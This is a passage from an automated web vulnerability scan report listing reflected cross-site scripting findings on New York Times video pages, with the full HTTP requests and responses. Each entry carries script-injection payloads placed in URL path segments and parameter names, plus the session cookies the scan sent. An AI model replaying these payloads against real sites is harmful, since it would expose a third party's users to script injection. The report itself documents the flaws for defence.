...[SNIP]...

3.330. http://video.nytimes.com/video/2010/10/25/continuous/1248069237870/timescast-october-25-2010.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.nytimes.com
Path:   /video/2010/10/25/continuous/1248069237870/timescast-october-25-2010.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e163c"><script>alert(1)</script>2f5978b7eee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010/10/25/continuous/1248069237870/timescast-october-25-2010.html?e163c"><script>alert(1)</script>2f5978b7eee=1 HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:12:43 GMT
Content-type: text/html
Content-Length: 226184

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010/10/25/continuous/1248069237870/timescast-october-25-2010.html?e163c"><script>alert(1)</script>2f5978b7eee=1">
...[SNIP]...

3.331. http://video.nytimes.com/video/2010/10/28/movies/1248069253174/creating-monsters.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.nytimes.com
Path:   /video/2010/10/28/movies/1248069253174/creating-monsters.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eca52"><script>alert(1)</script>0db974440ef was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010eca52"><script>alert(1)</script>0db974440ef/10/28/movies/1248069253174/creating-monsters.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:08:44 GMT
Content-type: text/html
Content-Length: 233587

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010eca52"><script>alert(1)</script>0db974440ef/10/28/movies/1248069253174/creating-monsters.html">
...[SNIP]...

3.332. http://video.nytimes.com/video/2010/10/28/movies/1248069253174/creating-monsters.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.nytimes.com
Path:   /video/2010/10/28/movies/1248069253174/creating-monsters.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 356dd"><script>alert(1)</script>d86ed30a8bd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010/10356dd"><script>alert(1)</script>d86ed30a8bd/28/movies/1248069253174/creating-monsters.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:10:10 GMT
Content-type: text/html
Content-Length: 233585

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010/10356dd"><script>alert(1)</script>d86ed30a8bd/28/movies/1248069253174/creating-monsters.html">
...[SNIP]...

3.333. http://video.nytimes.com/video/2010/10/28/movies/1248069253174/creating-monsters.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.nytimes.com
Path:   /video/2010/10/28/movies/1248069253174/creating-monsters.html

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55ecc"><script>alert(1)</script>dffe271a58 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010/10/2855ecc"><script>alert(1)</script>dffe271a58/movies/1248069253174/creating-monsters.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:11:00 GMT
Content-type: text/html
Content-Length: 233583

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010/10/2855ecc"><script>alert(1)</script>dffe271a58/movies/1248069253174/creating-monsters.html">
...[SNIP]...

3.334. http://video.nytimes.com/video/2010/10/28/movies/1248069253174/creating-monsters.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   http://video.nytimes.com
Path:   /video/2010/10/28/movies/1248069253174/creating-monsters.html

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9cf6b"%3b620fdd0f823 was submitted in the REST URL parameter 5. This input was echoed as 9cf6b";620fdd0f823 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/2010/10/28/movies9cf6b"%3b620fdd0f823/1248069253174/creating-monsters.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:11:57 GMT
Content-type: text/html
Content-Length: 96816

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="text/javascript">
var user_type = "0";
var s_prop20 = "";
var s_account = "nytimesglobal,nytmovies9cf6b";620fdd0f823";
var dcsvid = "";
var regstatus = "non-registered";
var s_channel = "movies9cf6b";620fdd0f823";
var s_prop2 = "";
var s_prop1 = "multimedia";
</script>
...[SNIP]...

3.335. http://video.nytimes.com/video/2010/10/28/movies/1248069253174/creating-monsters.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   http://video.nytimes.com
Path:   /video/2010/10/28/movies/1248069253174/creating-monsters.html

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 88bbb'%3b302aaaefc81 was submitted in the REST URL parameter 5. This input was echoed as 88bbb';302aaaefc81 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/2010/10/28/movies88bbb'%3b302aaaefc81/1248069253174/creating-monsters.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:12:19 GMT
Content-type: text/html
Content-Length: 96834

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
ilm%20on%20his%20computer.');
}
function getShareKeywords() {
return( '' );
}
function getShareSection() {
return( 'Video%20Library' );
}
function getShareSectionDisplay() {
return( 'movies88bbb';302aaaefc81' );
}
function getShareSubSection() {
return( '' );
}
function getShareByline() { //artist is specific to slide - should actually relate to entire show
return getTitleItem('auth', decodeURICom
...[SNIP]...

3.336. http://video.nytimes.com/video/2010/10/28/movies/1248069253174/creating-monsters.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.nytimes.com
Path:   /video/2010/10/28/movies/1248069253174/creating-monsters.html

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1af26"><script>alert(1)</script>7e0dfea89dd was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010/10/28/movies1af26"><script>alert(1)</script>7e0dfea89dd/1248069253174/creating-monsters.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:11:51 GMT
Content-type: text/html
Content-Length: 96952

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010/10/28/movies1af26"><script>alert(1)</script>7e0dfea89dd/1248069253174/creating-monsters.html">
...[SNIP]...

3.337. http://video.nytimes.com/video/2010/10/28/movies/1248069253174/creating-monsters.html [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.nytimes.com
Path:   /video/2010/10/28/movies/1248069253174/creating-monsters.html

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3db33"><script>alert(1)</script>6a65154c9c was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010/10/28/movies/12480692531743db33"><script>alert(1)</script>6a65154c9c/creating-monsters.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:12:36 GMT
Content-type: text/html
Content-Length: 233583

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010/10/28/movies/12480692531743db33"><script>alert(1)</script>6a65154c9c/creating-monsters.html">
...[SNIP]...

3.338. http://video.nytimes.com/video/2010/10/28/movies/1248069253174/creating-monsters.html [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.nytimes.com
Path:   /video/2010/10/28/movies/1248069253174/creating-monsters.html

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d81c0"><script>alert(1)</script>3f333c67ce5 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010/10/28/movies/1248069253174/creating-monsters.htmld81c0"><script>alert(1)</script>3f333c67ce5 HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:12:58 GMT
Content-type: text/html
Content-Length: 96828

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010/10/28/movies/1248069253174/creating-monsters.htmld81c0"><script>alert(1)</script>3f333c67ce5">
...[SNIP]...

3.339. http://video.nytimes.com/video/2010/10/28/movies/1248069253174/creating-monsters.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.nytimes.com
Path:   /video/2010/10/28/movies/1248069253174/creating-monsters.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c25eb"><script>alert(1)</script>feaaed33dee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010/10/28/movies/1248069253174/creating-monsters.html?c25eb"><script>alert(1)</script>feaaed33dee=1 HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:06:18 GMT
Content-type: text/html
Content-Length: 96770

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010/10/28/movies/1248069253174/creating-monsters.html?c25eb"><script>alert(1)</script>feaaed33dee=1">
...[SNIP]...

3.340. http://video.nytimes.com/video/2010/11/05/business/1248069286134/citigroup-prevails-in-emi-lawsuit.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.nytimes.com
Path:   /video/2010/11/05/business/1248069286134/citigroup-prevails-in-emi-lawsuit.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0625"><script>alert(1)</script>eed7e47a551 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010e0625"><script>alert(1)</script>eed7e47a551/11/05/business/1248069286134/citigroup-prevails-in-emi-lawsuit.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:01:24 GMT
Content-type: text/html
Content-Length: 233623

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010e0625"><script>alert(1)</script>eed7e47a551/11/05/business/1248069286134/citigroup-prevails-in-emi-lawsuit.html">
...[SNIP]...

3.341. http://video.nytimes.com/video/2010/11/05/business/1248069286134/citigroup-prevails-in-emi-lawsuit.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.nytimes.com
Path:   /video/2010/11/05/business/1248069286134/citigroup-prevails-in-emi-lawsuit.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ad6f"><script>alert(1)</script>1ea5dd66c51 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010/117ad6f"><script>alert(1)</script>1ea5dd66c51/05/business/1248069286134/citigroup-prevails-in-emi-lawsuit.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:03:25 GMT
Content-type: text/html
Content-Length: 233623

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010/117ad6f"><script>alert(1)</script>1ea5dd66c51/05/business/1248069286134/citigroup-prevails-in-emi-lawsuit.html">
...[SNIP]...

